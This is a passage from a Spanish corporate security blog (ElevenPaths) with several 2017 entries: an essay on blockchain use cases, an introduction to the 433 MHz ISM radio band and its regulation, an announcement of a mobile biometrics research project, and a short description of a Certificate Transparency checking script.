servicios de alojamiento con la reputada experiencia de Telefónica para ofrecer calidad de servicio en las comunicaciones y también con la más avanzada protección de los productos de ElevenPaths operados desde los Centros de Operaciones de Seguridad (SOCs) desplegados por todo el mundo. Mercedes Soto Rodríguez Jefe de Producto de seguridad en la nube mercedes.sotorodriguez@telefonica.com Francisco Oteiza Lacalle Jefe de producto de Seguridad Gestionada @Fran_Oteiza francisco.oteizalacalle@telefonica.com
25 de julio de 2017
Blockchain VI. Blockchain hasta en la sopa, una paradoja
Tras esta serie de entradas, quizás podemos concluir que blockchain es una tecnología revolucionaria. Pero no hemos enumerado simplemente sus virtudes, su esencia criptográfica y su robustez… sino que hemos comprobado cómo ha sido fundamental el conocimiento y el ingenio humano para escoger sabiamente ese aparente santo grial. La imaginación y la resolución humana han sido las que verdaderamente han encontrado los casos de mayor éxito del blockchain, tanto para bien como para mal. En esta entrada repasaremos algunos proyectos montados sobre blockchain que demuestran la versatilidad y capacidad de aplicación de la cadena de bloques. Ethereum Sin duda hay que comenzar con el fork más prometedor y posiblemente el más útil de todos los que han surgido. Ethereum permite realizar contratos inteligentes dotando de características avanzadas cada transacción. Unas acciones supeditadas a otra criptodivisa, que en este caso son los Ethers. La esencia de Ethereum radica en que contiene código ejecutable para cumplir las condiciones del contrato, desarrollando aplicaciones descentralizadas e inmutables. Este código permite que Ethereum sea más que una criptomoneda, sino que lo convierte en un protocolo para muchísimos tipos de usos que deban ser versátiles, realizar una ejecución y a la par obtenga el soporte, seguridad y robustez que provee el núcleo de blockchain. Es decir, Ethereum puede definir las reglas que rigen una transacción, por tanto, es un sistema financiero por sí solo, sin intermediarios. ¿Aún no se entiende? Veamos un ejemplo: Podríamos realizar una porra deportiva sobre un evento deportivo donde cada uno de los ejecutantes del contrato realizaría una apuesta. Tras el evento, el ganador recibirá la recaudación, como ha estipulado el contrato hecho en Ethereum. El Ether ha tenido por fin su merecida expansión económica a lo largo del 2017, y eso que su razón de ser es alimentar y permitir los contratos que se generan. Cabe por tanto preguntar si los Ethers están fuera del interés de los especuladores. Lamentablemente no, y basta ver el flujo de revalorización de esta moneda para comprobar que no escapa del vicio especulativo de las criptomonedas. Pero a día de hoy Ethereum tiene dos problemas mucho más destacables y recurrentes. El primero es la baja tolerancia de su red a las Initial Coin Offering (ICO), que básicamente es apartar (comprar) una buena reserva de Ethers para iniciar una actividad o servicio en paralelo montado sobre Ethereum, utilizando para ello una ronda de inversión. A día de hoy algunas de las ICOs han generado auto DDoS temporales a nivel global en la red de nodos de Ethereum, con el perjuicio que esto supone. El segundo problema está ligado a una de estas ICO para la criptomoneda DAO en mayo de 2016. Un error de código de dicha criptomoneda permitía robar y desviar dinero según ciertas condiciones de los contratos, un completo fiasco. Lo grave fue que Ethereum trató de recuperar y reinsertar dichas monedas en su flujo principal anulando todas las transacciones relacionadas con DAO, algo que chocaba taxativamente con las directrices del blockchain. Esto (para que lo entendamos) está al mismo nivel que borrar las leyes de la robótica del Roomba y pedirle que atropelle al vecino. El incidente provocó la separación de Ethereum en d os forks, uno donde se corrigió el error de DAO y otro, el Ethereum Classic donde permanece inmutable y se aprendió a convivir con DAO en su historial. Qué anecdótico sería por tanto, que se juntasen estos dos problemas a la vez, es decir, aprovecharse de un ICO para "hackear" la creación de una nueva moneda. Dicho y hecho, 18 de julio de 2017, CoinHash es atacada durante una ampliación de capital mediante un ICO. Si bien es cierto que el ataque nada tuvo que ver con Ethereum directamente, sino de la plataforma web de CoinHash. No se quedan ahí las anomalías, Ethereum classic también ha sufrido recientemente cuando este mismo mes de julio de 2017 fue también atacado haciéndose con el control de su hosting web, lo que aprovecharon para redirigir transacciones a cuentas maliciosas. Internet de las cosas Este es sin duda uno de los ejemplos más claros donde una tecnología de seguridad distribuida casa a la perfección con un entorno de trabajo tan distribuido como el IoT. Ya suena entre los tertulianos un "Chain of IoT" mientras remueven su copa de coñac. Y no hay pocos casos de ejemplos de blockchains creados para estos entornos como los que definen una red inalámbrica segura como Filament. O para introducir mecanismos de autenticación continua de los dispositivos a través de blockchain como quiere hacer el operador de comunicaciones Telstra. Pero no se queda ahí la cosa, el IoT es el mercado tecnológico más en auge y que más sensibilidad despierta recientemente respecto a su seguridad. No podemos olvidar el impacto de la red Mirai. Por tanto toda iniciativa en que mejore la seguridad global de las redes IoT tendrá un prometedor futuro y una acogida favorable por el mercado. También en este sentido, se trata de aprovechar el potencial M2M de los dispositivos que establecen comunicación entre pares para comunicarla a través de una red blockchain. Un caso de los más claros sería la compartición de información de manera segura entre vehículos (C2C), mejorando las notificaciones de sucesos de interés y siempre circunscrito a los elementos de seguridad de la cadena de bloques. También han surgido intereses mucho más comerciales como la venta privada de la telemetría de los dispositivos IoT o similares, como podrían ser los mencionados vehículos, como propone Tilepay. Identidad y validación de datos La gestión de la identidad es un discurso ampliamente alimentado por los constantes debates sobre privacidad y el control de los datos personales. Más cuando la cantidad de datos que las empresas conocen sobre nosotros es tan preocupantemente elevada. Actualmente existen muchísimas soluciones sobre blockchain destinadas al empoderamiento de los usuarios sobre sus datos privados y personales, como son Civic, Onename y muchos más. Así como también para gestionar los derechos de propiedad. De esta manera podemos tener un registro público donde son las confirmaciones de los usuarios quien garantiza la identidad del individuo y sus bienes en propiedad, siempre respaldados por otros tipos de factores vinculados al individuo como podrían ser los biométricos. Esto ha sido extendido a distintos servicios de validación de todo tipo de datos, expandiéndose a ámbitos notariales, administrativos, médicos, judiciales, etc. Así hace Factom, Tieriom y tantísimos más. Seguimiento y tracking El seguimiento y tracking puede a priori no demostrar un encaje con blockchain, pero pueden existir entre los agentes implicados en la distribución, distintos intereses para alterar y manipular la procedencia o la calidad de algún determinado producto, por tanto podemos entender la importancia de un mecanismo inmutable y verificable. Esto mismo pensó EverLedger para permitir el marcaje y trazabilidad de un bien tan codiciado como los diamantes, permitiendo reducir el fraude gracias a una inmutable asociación entre las joyas y su procedencia. Pero esto no se queda aquí, podríamos aplicarlo a frutas, verduras o jamones... Este es un paso interesante para favorecer la tan socorrida transparencia de la cadena de suministro. En concreto sobre alimentación, existen cientos de ejemplos en uso como Provenance y proyectos en vigor con cierta madurez como la propia Walmart que realiza una exhaustiva traza de los productos que ofrece en sus supermercados. La logística y la industria del transporte mira con buenos ojos este tipo de herramientas, teniendo en cuenta que es un sector muy controlado y al que se le impone un elevado grado de exigencia. Por tanto sus principios casan a la perfección con los que acompañan a blockchain como habilitador. Voto Electrónico Supongamos que queremos permitir a la población que efectúen votos electrónicos sobre determinadas decisiones de gobierno que influirán al conjunto de los habitantes. Para ello es necesario que el sistema sea capaz de identificar, autenticar, proteger el voto, anonimizar el envío y por último realizar el escrutinio de forma confiable, pero a la vez verificable. En cualquier caso, debe ser constatable que un individuo ha realizado un voto, independiente de lo que haya votado. Desde el punto de vista de la seguridad, el blockchain para el voto electrónico es bastante interesante al utilizar mecanismos de cifrado homomórfico, que permite realizar el cifrado de datos de manera incremental (a medida que llegan nuevos votos) y que únicamente a la conclusión y con toda la colección de datos se puede descifrar la información. Ningún intermediario puede interceptar y descubrir información relativa a las votaciones gracias a este mecanismo criptográfico. Telefónica y ElevenPaths trabajamos junto a varios socios en varios proyectos destinados a explorar las necesidades de seguridad emergentes en el voto electrónico. Uno de los proyectos más avanzados se ejecuta junto a Stampery, pero no debemos descuidar la gran cantidad de empresas que se dedican de igual forma a la aplicación de blockchain para estos usos como puede ser también Follow my vote. Un gran cajón de sastre No nos metamos aún en la cabina de suicidio ya que todavía no hemos arañado siquiera la superficie. Existen otros usos del blockchain algo más "curiosos". Se podría, por ejemplo, participar en un ecosistema que facilite el contacto y la comunicación entre pacientes y dentistas. Se plantea en Dentalcoin. Como es lógico no podemos abordar todo el abanico de usos del blockchain, apenas hemos hablado de las Altcoins, o monedas que llegaron tras el bitcoin, como LiteCoin o ZCash. O las Sidechains que básicamente son otras redes blockchain que se alimentan en su comienzo de una reserva de bitcoins para proveer de servicios, de igual forma que lo haría un ICO en Ethereum. No hemos hablado de su uso en la industria aeronáutica para controlar la cantidad de dispositivos, sensores y elementos de los aviones. También en la protección de la integridad de los datos donde en ningún caso se puede acceder a ficheros ni a su localización salvo a través del blockchain. O unos movimientos muy interesantes que se están efectuando para migrar parte de las capacidades de blockchain a módulos criptográficos hardware, con múltiples aplicaciones en asuntos de certificación hardware y mejora de la cadena de confianza en la ejecución de software firmado. También en la definición de redes sociales/foros de opinión donde no exista la figura del administrador, etc. Conclusión Blockchain lo inunda todo, está presente en todos los ámbitos. Tan extendido está, que si una empresa no tiene un frente activo con Blockchain no parece que esté en el cutting edge cool master race de las empresas tecnológicas. Hemos repasado usos realistas y útiles donde Blockchain es el elemento principal. El problema suele ser (en casi todo) que cuando surge una corriente del "todo vale" algo abusiva, muchas aplicaciones del Blockchain parecen poco justificadas y en muchos casos fuera de lugar. Como dijimos al principio el ingenio humano ha permitido alzar la tecnología de Blockchain a su ámbito natural, y esperamos que la lógica se encargue de impedir que su expansión roce en algunos casos el ridículo. Solo queda decir que Blockchain tiene inimaginables posibilidades, y aunque algunas de ellas puedan parecer estúpidas, no nos engañemos, seguramente lo sean. Marcos Arjona Innovación y laboratorio marcos.arjona@11paths.com
24 de julio de 2017
Los 433 MHz y el software libre. Parte 2.
Las bandas ISM El UTI-R define varias bandas de frecuencias para usos no comerciales, conocidas como bandas ISM por la siglas en inglés de “ Industrial, Científico y Médico”, con fines industriales, científicos, médicos, domésticos o similares, las cuales no requieren de una licencia para su uso, denominándose “ sin licencia” o en inglés “ license-free”; lo que no significa que se puedan utilizar libremente, ya que siguen estando fuertemente regladas, tanto a nivel técnico, como en sus condiciones de uso. Principales bandas ISM reguladas internacionalmente De forma adicional a las bandas ISM, y a instancias del UTI-R, los organismos reguladores definen muchas otras bandas de frecuencias para otros usos “ no licenciados”, como por ejemplo: Banda PMR446, (446 MHz) regulada por el ETSI para el uso de intercomunicadores de mano (walkies) en el territorio Europeo (CEPT). Banda FSR (462 MHz y 467 MHz) regulada por la FCC para el uso de intercomunicadores de mano (walkies) en EEUU. Banda LDP433 (433 Mhz) regulada por el ETSI para el uso de intercomunicadores de baja potencia en el territorio Europeo (CEPT). Banda CB (27 MHz) o “Banda Ciudadana”, que aunque regulada nacionalmente, su aceptación es prácticamente global. Bandas U-NII (5 GHz) “Unlicensed National Information Infrastructure”, regulada por la FCC para su uso en redes digitales de nueva generación en EEUU. Cabe destacar que la regulación de uso de estas bandas sin licencia, no implica que estén reservadas de forma exclusiva, ya que en la mayoría de los casos estas bandas se comparten, total o parcialmente, con otros usos, como por ejemplo: radiolocalización, radiobúsqueda, radiobalizas, telemandos, etc., y de forma muy recurrente, con las bandas atribuidas a los “ radioaficionados licenciados”. Bandas atribuidas a Radioaficionados El UTI-R designa un generoso número de bandas de frecuencia para su uso por parte del colectivo de radioaficionados, los cuales deben de estar en posesión de una licencia que les acredita como tales. En los primeros años del siglo XX, los aficionados a las comunicaciones a través de la radiofrecuencia, recién descubierta por aquel entonces, crecieron rápidamente al mismo ritmo que la propia tecnología que utilizaban, en muchas ocasiones gracias a sus experimentos e investigaciones. Se organizan en asociaciones nacionales reunidas bajo la “ La Unión Internacional de Radioaficionados” IARU, por sus siglas inglés, emitiendo su propia reglamentación y planificación de uso dentro de las bandas atribuidas. Las bandas de radioaficionados cubren todos los segmentos del espectro radioeléctrico, ya que cada segmento posee unas características de propagación y uso particulares, que dependen de diferentes factores atmosféricos y climatológicos. Se identifican por su longitud de onda, de forma preferente al rango de frecuencias o frecuencia central que ocupan. Análogamente a las bandas ISM, las bandas de radioaficionados no están reservadas en exclusiva, compartiendo su utilización en muchas ocasiones, por lo que no deben causar interferencias perjudiciales en otros usos, ni reclamar protección frente a la interferencia procedente de ellos. De hecho, para el caso particular de compartición con bandas ISM, el UTI-R indica específicamente que deben aceptar la interferencia perjudicial resultante de estas aplicaciones. La banda ISM de 2.4GHz es, sin lugar a dudas, la que soporta un uso más intensivo, ya que es utilizada en diferentes estándares de redes Wi-Fi (IEEE 802.11b/g/n) y Bluetooth, (IEEE 802.15.1), llegando en muchas ocasiones a su completa saturación. Situación que está provocando una progresiva migración a otras bandas ISM: la de 5GHz para las redes Wi-Fi (IEEE 802.11ac) y las bandas Sub-GHz para las aplicaciones y redes LPWAN del ecosistema IoT como Sigfox, LoRaWan, Dash7, Z-Wave, Neul, etc., no sin dificultades en este último caso. Uno de los mayores problemas está originado por la diferencia en las regulaciones de la banda ISM justo por debajo del Gigahercio: Banda ISM 902 – 928 MHz regulada por la FCC para EEUU. Banda ISM 868 – 869 MHz regulada por el ETSI para Europa (CEPT Countries). Por este motivo, muchos de los nuevos estándares tienen a soportar diferentes bandas ISM, como es el caso de Zigbee (IEEE 802.15.4), que pese a soportar estas dos bandas, su uso generalizado está en la banda ISM de 2.4GHz por la globalidad que esta proporciona. Banda ISM de 433 MHz La banda ISM de 433MHz, cohabita en la banda UHF de 70cm de radioaficionados, la cual en España está limitada por el CNAP, al rango de frecuencias comprendido entre 430 MHz y 440 MHz. Asignación de usos entorno a la banda UHF de 70 cm de radioaficionados en España El ancho de la banda ISM de 433 MHz es, en oposición al termino que lo define, relativamente estrecho, únicamente 1750 KHz, comprendidos entre 433,050 MHz y 434,790 MHz. Siendo la máxima potencia radiada aparente (PRA) permitida de tan solo 100 mW (milivatios), contrastando con los hasta 1000 W (vatios) de potencia isotrópica radiada equivalente (PIRE), a los que pueden llegar los radioaficionados en algunos casos (cien mil veces más). En determinadas ocasiones podemos encontrar analogías y paralelismos entre los sistemas de 433 MHz y los de 315 MHz, esto es debido a que Japón y otros países asiáticos han regulado la banda ISM equivalente a 433 MHz en la frecuencia de 315 MHz, permitiendo a su vez una cierta compatibilidad con las regulaciones de la FCC en EEUU. La infinidad de aplicaciones que hacen uso de la banda ISM de 433 MHz puede dividirse en dos grandes grupos en función del tipo de modulación que utilicen: AM o FM; generalmente en modos de codificación digital. Modulación AM/FM Recientemente se está popularizando la utilización de modos digitales derivados de la modulación de frecuencia (FM): FSK, PSK, GFSK, MSK o GMFK, junto al patentado LoRa, en gran parte gracias a la disponibilidad de módulos económicos, como la serie RFM de HopeRF. Módulos de radiofrecuencia a 433MHz con modulación FM El proyecto “ Moteino” fue pionero integrando estos módulos junto con Arduino, le siguió Adafruit, y con la irrupción de LoRaWan ha aparecido un gran número de adaptaciones compatibles tanto con Arduino como con Raspberry PI. Otro uso muy generalizado de estas modulaciones en la banda ISM de 433 MHz lo encontramos en los sistemas de telemetría para drones y otros vehículos de aeromodelismo. Aunque el uso tradicional de la banda ISM de 433 MHz, y por ende el más extendido, es en modulación de amplitud de onda (AM), y concretamente en el modo de más sencillo de codificación digital binaria “OOK” (On-Off Keying), por desplazamiento de amplitud “ASK” (Amplitude Shift Keying). Ejemplos de modulación: de amplitus, de frecuencia y de fase La facilidad con la que puede implementarse la modulación digital ASK/OOK, tanto en emisores como en receptores, ha hecho que sea profusamente utilizada en todo tipo de dispositivos domóticos domésticos de uso cotidiano, como telemandos de automóviles, de puertas de garaje, en la automatización de toldos y persianas, estaciones meteorológicas, detectores de humo y gases, sensores de alarmas para puertas, ventanas o de movimiento, interruptores de luces y pequeños electrodomésticos, dimmers, termostatos, timbres, medidores de consumo eléctrico, etc. la lista es interminable. Dispositivos de radiofrecuencia a 422MHz AM (ASK/OOK) No obstante, cada fabricante ha desarrollado su propio protocolo de codificación, por lo que aunque la frecuencia de trabajo sea la misma o muy similar, varían el número y la duración de los pulsos OOK, así como su significado, por lo que la compatibilidad entre dispositivos de diferentes fabricantes es prácticamente inexistente, y en ocasiones, incluso tratándose del mismo fabricante. Pese a que hay algunos protocolos relativamente estándar y documentados, la mayoría de los fabricantes guardan con recelo los detalles de implementación de sus protocolos, especialmente cuando incorporan mecanismos de seguridad como algoritmos de cifrado o rolling-code. Por este motivo, la implementación hardware en emisores y receptores de radiofrecuencia suele incluir únicamente el modulador o demodulador ASK/OOK con entrada o salida binaria, estando la lógica del protocolo de codificación implementa por software en un microcontrolador u otro elemento similar. Gracias a esta particularidad, hay disponibles una gran cantidad de módulos emisores y receptores AM (ASK/OOK) para la banda ISM de 433MHz, de bajo coste y elevada facilidad de integración con cualquier plataforma de desarrollo, como Arduino o Raspberry PI. Módulos genéricos de RF 433MHz AM (ASK/OOK) Los módulos más accesibles de origen chino rondan poco más de un Euro; los hay de muchos tipos, cada uno con sus peculiaridades. Normalmente se encuentran en parejas de emisor y receptor, aunque todos son compatibles entre si. El más popular es el par XD-FST FS1000A, pero su receptor es muy ruidoso; por más o menos el mismo precio, el receptor RXB6 ofrece unas prestaciones muy superiores, aunque todavía lejos de fabricantes europeos como Aurel, que incluso dispone de un dispositivo que integra emisor y receptor en un mismo módulo; muy utilizado en sistemas comerciales por usar una única antena para la emisión y recepción, aunque requiere de electrónica adicional para gestionar esta conmutación, y consecuentemente su coste es más elevado. Codificación Existen varios protocolos que por su sencillez y para facilitar su integración en aplicaciones de escasa criticidad, se implementan por hardware en un chip específico que realiza las tareas de codificación y descodificación; como por ejemplo estas parejas de emisor/receptor: HX2262 / HX2272 - PT2262 / PT2272 - SC5262 / SC5272 (compatibles entre si) EV1527 / RT1527 - FP1527 / HS1527 (compatibles entre si) Los conjuntos emisor/receptor que utilizan estos protocolos implementados en hardware siempre vienen emparejados para garantizar su correcto funcionamiento de forma prácticamente autónoma, sin que sea necesario ningún elemento adicional. Módulos de RF 433MHz AM (ASK/OOK) con protocolo codificado por hardware Salvo estas excepciones y alguna otra como X10, donde el protocolo de codificación está perfectamente documentado, la inmensa mayoría de la información disponible sobre los cientos de protocolos existentes ha sido obtenida mediante técnicas de ingeniería inversa por una nutrida comunidad de investigadores, los cuales, en la mayoría de los casos hacen públicos sus descubrimientos, y comparten bajo diferentes licencias de Software Libre y Código Abierto, su implementación por software. La nomenclatura de los protocolos no está regida en modo alguno, por lo que podemos encontrar diferentes nombres para identificar un mismo protocolo, según la implementación, librería o software que estemos utilizando. Por ejemplo; “Nexa”, “Proove”, “Anslut”, e incluso “HomeEasy”, son sinónimos del mismo protocolo. Más información: Los 433 MHz y el software libre. Parte 1. Los 433 MHz y el software libre. Parte 3. Los 433 MHz y el software libre. Parte 4. Jorge Rivera CSA Global de ElevenPaths jorge.rivera@11paths.com
21 de julio de 2017
Los 433 MHz y el software libre. Parte 1.
Los sistemas de Radiofrecuencia y la Seguridad han mantenido siempre una discreta relación, aunque recientemente está adquiriendo un elevado protagonismo gracias a la proliferación de dispositivos IoT y Domóticos, que utilizan múltiples vías de comunicación hasta ahora inadvertidas. Esta situación quedó de manifiesto durante la conferencia de Seguridad RootedCON de 2016; en la ponencia de Raúl Siles, “ La Cena de los IdoTas”. Se abordaban diferentes cuestiones de seguridad entorno a dispositivos IoT Domóticos dotados de diversas conexiones inalámbricas. Raúl hizo hincapié en las nuevas amenazas que acechan a los sistemas que trabajaban en las “ bandas Sub-Gigahercio”, es decir, cuya frecuencia es inferior a 1000 MHz. Realizó una demostración en la que capturaba señales emitidas por mandos de radiocontrol de interruptores y luces domésticas en la frecuencia de 433 MHz, analizaba el protocolo, y posteriormente conseguía volver emitir las señales adecuadas para manejar los dispositivos a su antojo. Con este sencillo ejemplo se evidenciaba la ausencia de medidas de seguridad en muchas de las aplicaciones que hacen uso de esta banda. Tanto la captura de las señales de radiofrecuencia, como su re-emisión, se efectuaba por medio de un dispositivo hardware específico, el YARK Stick One, de elevado coste y difícil de conseguir; en contraste con la tendencia actual en los sistemas de radiofrecuencia, la cual gira vertiginosamente hacia el SDR (Radio Definida por Software), limitando al mínimo imprescindible la implementación por hardware. YARD Stick One Estas circunstancias, unidas a la gran cantidad de Software Libre y de Código Abierto disponible para diferentes aplicaciones de radiofrecuencia en la banda de 433 MHz, invita a reflexionar sobre sus posibles usos junto con el mínimo hardware posible. Sistemas de Radiofrecuencia La excelente interoperabilidad que disfrutamos en los sistemas de radio comunicación obedece en gran medida a la minuciosa gestión del espectro electromagnético que realiza la Unión Internacional de Telecomunicaciones “ITU”. Con sede en Ginebra, la ITU es la organización intergubernamental más antigua del mundo, creada en 1865 para controlar las conexiones internacionales de telégrafos. Actualmente dependiente de la Organización de Naciones Unidas “ONU”, confecciona el Reglamento de Radiocomunicaciones “ITU-R”, el cual es adoptado, con rango de tratado, por los países adheridos. El espectro electromagnético es el conjunto de todas las posibles frecuencias de radiación de las ondas electromagnéticas, abarcando desde la mínima longitud de Planck, hasta el infinito. Las ondas pueden medirse tanto por su frecuencia de oscilación, en ciclos por segundo, como por la distancia que recorre su perturbación en un ciclo, expresando esta longitud en metros, junto con múltiplos y submúltiplos, desde el Kilometro al Ångström. Representación del espectro electromagnético La unidad del “Sistema Internacional de Unidades”, para la medida de la frecuencia (ciclos por segundo) de las ondas electromagnéticas es el Hercio (Hz), llamada así en honor al físico alemán Heinrich Rudolf Hertz por descubrir su propagación. Son de uso generalizado sus múltiplos: Kilohercio (KHz), Megahercio (MHz) y Gigahercio (GHz). Se utiliza el termino “ banda” para referenciar un intervalo, segmento, rango o porción del espectro electromagnético. De forma general, tanto la ITU como otros organismos internacionales, designan con abreviaturas o numéricamente diferentes bandas de frecuencias dentro del intervalo denominado de radiofrecuencia “RF”, comprendido entre los 3 KHz y los 300 GHz. Ditribución de diferentes bandas de radiofrecuencia (lurailabs.com) Regulación Cada país dispone de una cierta autonomía para gestionar el uso del espectro electromagnético en su territorio, así como la explotación comercial del mismo, otorgando licencias para radios comerciales, televisiones, telefonía móvil, y otros usos profesionales, procurando no contradecir los dictámenes del UTI-R. No obstante, los principales organismos reguladores, la FCC, Comisión Federal de Comunicaciones de los EEUU, y el ETSI, Instituto Europeo de Normas de Telecomunicaciones, no siempre coinciden plenamente en sus normativas, existiendo diferencias en cuanto a la atribución de uso de ciertas bandas, con independencia de la legislación nacional que aplique individualmente cada país en su territorio. En España por ejemplo, las regulaciones nacionales se articulan mediante el CNAF, Cuadro Nacional de Atribución de Frecuencias, el cual emite las notas de Utilización Nacional (UN), que matizan, amplían o restringen, los dictámenes del UTI-R y el ETSI. Las concesiones de uso comercial son de carácter público, y pueden consultarse online en la página web del “ Registro Público de Concesiones de Telecomunicaciones”: Ejemplo de licencia de concesión de Telecomunicaciones La activad del UTI es independiente de otros organismo encargados de estandarizar el uso del espectro en función de su asignación, destacando los trabajos del ETSI, que con proyección mundial, ha promovido la estandarización de los sistemas de telefónica móvil GSM y el sistema de radió profesional TETRA. Estando adscrito al ETIS el consorcio 3GPP (3rd Generation Partnership Project) encargado de definir las especificaciones de las redes de tercera generación 3G derivadas del GSM, como GPRS, EDGE o UMTS. Más información: Los 433 MHz y el software libre. Parte 2. Los 433 MHz y el software libre. Parte 3. Los 433 MHz y el software libre. Parte 4. Jorge Rivera CSA Global de ElevenPaths jorge.rivera@11paths.com
14 de julio de 2017
Innovación y laboratorio de ElevenPaths participa en el proyecto AMBER (“enhAnced Mobile BiomEtRics”)
ElevenPaths participa en el proyecto AMBER ("enhAnced Mobile BiomEtRics") desde el 1 de enero de 2017 como socio industrial. AMBER pertenece a la Red de Formación Innovadora (Innovative Training Network) Marie Skłodowska-Curie con Número de Acuerdo 675087, abordando una serie de retos y necesidades relativas a las soluciones biométricas en dispositivos móviles. Este proyecto concluirá el 31 de diciembre de 2020 y hasta entonces liderará el entrenamiento y la formación de la siguiente generación de investigadores en el área de la biometría. Ayudará a acomodar sus actividades científicas tanto para cumplir con los objetivos académicos como para satisfacer los requisitos industriales y profesionales del mercado actual. El Proyecto AMBER acogerá diez proyectos Marie Sklodowska-Curie Early Stage Researcher (ESR) en cinco universidades Europeas distintas. Dichos proyectos recibirán soporte directo de siete socios industriales que mentorizarán el desarrollo de los proyectos y comprobarán su alineamiento con las necesidades del mercado. El objetivo de esta red radica en unificar y complementar el sector académico con la experiencia industrial a nivel europeo, entrenando y equipando a la siguiente generación de investigadores para definir, investigar e implementar soluciones, desarrollando mecanismos que garanticen la seguridad, ubiquidad y eficiencia de los sistemas de autenticación a la vez que se protege la privacidad de los ciudadanos. Estos últimos años, la ubiquidad de las plataformas móviles como smartphones y tablets ha crecido considerablemente. Esos dispositivos proveen de un rango de interacción sin límites que era inimaginable hace tan solo diez años. Esta habilidad para interaccionar con servicios y con los individuos acarrea la necesidad de autenticar con precisión la identidad de la persona, requiriendo una serie de datos que puede incluso contener vínculos financieros o legales. Las soluciones biométricas también han incrementado su presencia durante la última década con implementaciones a gran escala en ciertas áreas, como en pasaportes o sistemas nacionales de identidad. La adopción de sensores específicos para biometría por los fabricantes de móviles indica una estrategia a largo plazo en términos de autenticación. Esta adopción demuestra un factor crítico, los usuarios deben confiar en la biometría en términos de usabilidad, privacidad y rendimiento; donde ninguna de estas categorías debe verse comprometida o de lo contrario se adolecería de desconfianza y reticencia a adoptar estos mecanismos por encima de los métodos convencionales de autenticación. El diseño, implementación y valoración de la biometría en dispositivos móviles requiere por tanto de un rango de soluciones que ayuden a la adopción inicial y continuada. La UE necesita disponer de expertos entrenados específicamente en este campo, para garantizar la participación, competitividad y éxito en el mercado global. AMBER se compone de cuatro elementos clave para proceder con el entrenamiento y reclutado de los ESRs, investigadores en etapa temprana: Una institución Beneficiaria Anfitriona proveerá de recursos y experiencia directamente asociada a cada proyecto. Traslado a una institución académica vinculada (una de las Beneficiarias Académicas) que trabaje en una sub-disciplina complementaria y que provea de experiencia adicional y recursos. Traslado a una compañía industrial (entre las Organizaciones socias como ElevenPaths) lo cual permitirá una comprensión de las demandas actuales y futuras del mercado en cuanto a soluciones, acceso a recursos industriales, clientes y la posible integración de soluciones en la implementación de tecnologías líderes del mercado. Una serie de eventos de formación coordinados para vincular varios de los proyectos de AMBER y que provean de un rango de habilidades transferibles que permitan tanto investigaciones futuras como desarrollos de calidad en el campo de la biometría. ElevenPaths apoyará a la Universidad Carlos III de Madrid (UC3M) en el ESR9, Vulnerability assessment in the use of biometrics in unsupervised environments: La utilización de biometría en dispositivos móviles implica que la autenticación será gestionada sin ningún tipo de supervisión. Al no existir supervisión, el usuario (o cualquiera que haya tenido acceso al dispositivo) puede realizar cualquier clase de ataque al proceso de autenticación sin restricciones. Por tanto, los mecanismos para detectar dichos ataques y evitar el uso malintencionado del dispositivo deber ser implementados. Aunque este objetivo es común a muchos sistemas de autenticación, nuevos retos a tener en cuenta surgen al considerar el uso de dispositivos móviles. El primero es la variedad de fabricantes, modelos y sistemas operativos de los dispositivos que poseen los ciudadanos. Este reto significa que las soluciones obtenidas deben ser multiplataforma, tanto como sea posible. Otro reto es que los dispositivos móviles no han sido fabricados considerando autenticación biométrica, incluso sin mecanismos de autenticación, pero sí para proveer de otros servicios a los usuarios (e.j. llamadas, conexión de datos, navegación web, etc.). Esto significa que el investigador debe, a priori, no considerar ningún tipo de ayuda de los fabricantes móviles, incluso algunos de estos fabricantes pueden mostrarse contrarios ante cualquier tipo de sugerencia de integrar nuevos sensores debido al potencial aumento de los costes. Por otro lado, los dispositivos móviles disponen de otros muchos sensores que pueden ser aprovechados por el proceso de autenticación para mitigar vulnerabilidades. Por tanto podemos definir otro reto adicional que consiste en analizar cómo estos sensores pueden ser utilizados para el beneficio del ciudadano a bajo coste. Este proyecto de tres años comenzará con el estudio de la biometría, tecnologías móviles y la seguridad. A continuación, el ESR realizará distintos análisis de seguridad y evaluaciones de riesgos, abordando diferentes casos de uso. A tenor de los resultados obtenidos, en particular de las vulnerabilidades detectadas, se procederá con las actividades de I+D de cara a desarrollar un marco de trabajo cuantificable y herramientas que permitan identificar y mitigar las vulnerabilidades, manteniendo la universalidad a un nivel viable (e.j. sin reducir significativamente la cantidad de usuarios por introducir dichos mecanismos). Finalmente, la tecnología desarrollada será integrada en alguna aplicación de uso común que pueda evaluar el rendimiento, la robustez y la aceptación del usuario, promoviendo el uso del dispositivo y dicho marcho de trabajo en la industria Innovación y laboratorio www.elevenpaths.com
10 de julio de 2017
Nueva herramienta: PySCTChecker
Esta nueva herramienta es un script "quick and dirty" que permite comprobar si un dominio implementa correctamente Certificate Transparency. Además, si lo implementa, es posible comprobar si lo hace correctamente en el lado del servidor. Cuando un servidor implementa Certificate Transparency, debe ofrecer al menos un SCT (una prueba de la inclusión del certificado TLS del servidor en un log de transparencia. El servidor puede ofrecer el un SCT por tres diferentes vías: Incrustado en el certificado Como una extensión TLS Vía OCSP Stapling Utilizando PySCTChecker es posible identificar mediante qué vías ofrece el servidor los SCT y a qué logs de CT se ha enviado el certificado. Además, es posible comprobar si los SCT ofrecidos son válidos y están legítimamente firmados por los logs a los que pertenecen. El script solo necesita como entrada una lista de dominios. Para cada uno de estos dominios, comprobará si implementa correctamente Certificate Transparency. Si el servidor ofrece algún SCT, el script mostrará información extra como por ejemplo porqué vía lo ofrece el servidor y los logs a los que se ha enviado el certificado. Uso: python PySCTChecker/ct_domains_sct_checker.py [domain1 domain2 ...] Ejemplo de salida: Esta es una implementación "quick and dirty" puesto que se apoya en OpenSSL para ciertas funcionalidades, pero esperamos que permita entender mejor cómo funciona certificate transparency. El código se puede descargar y comprobar desde aquí.
3 de julio de 2017
Potenciales usos maliciosos de Blockchain
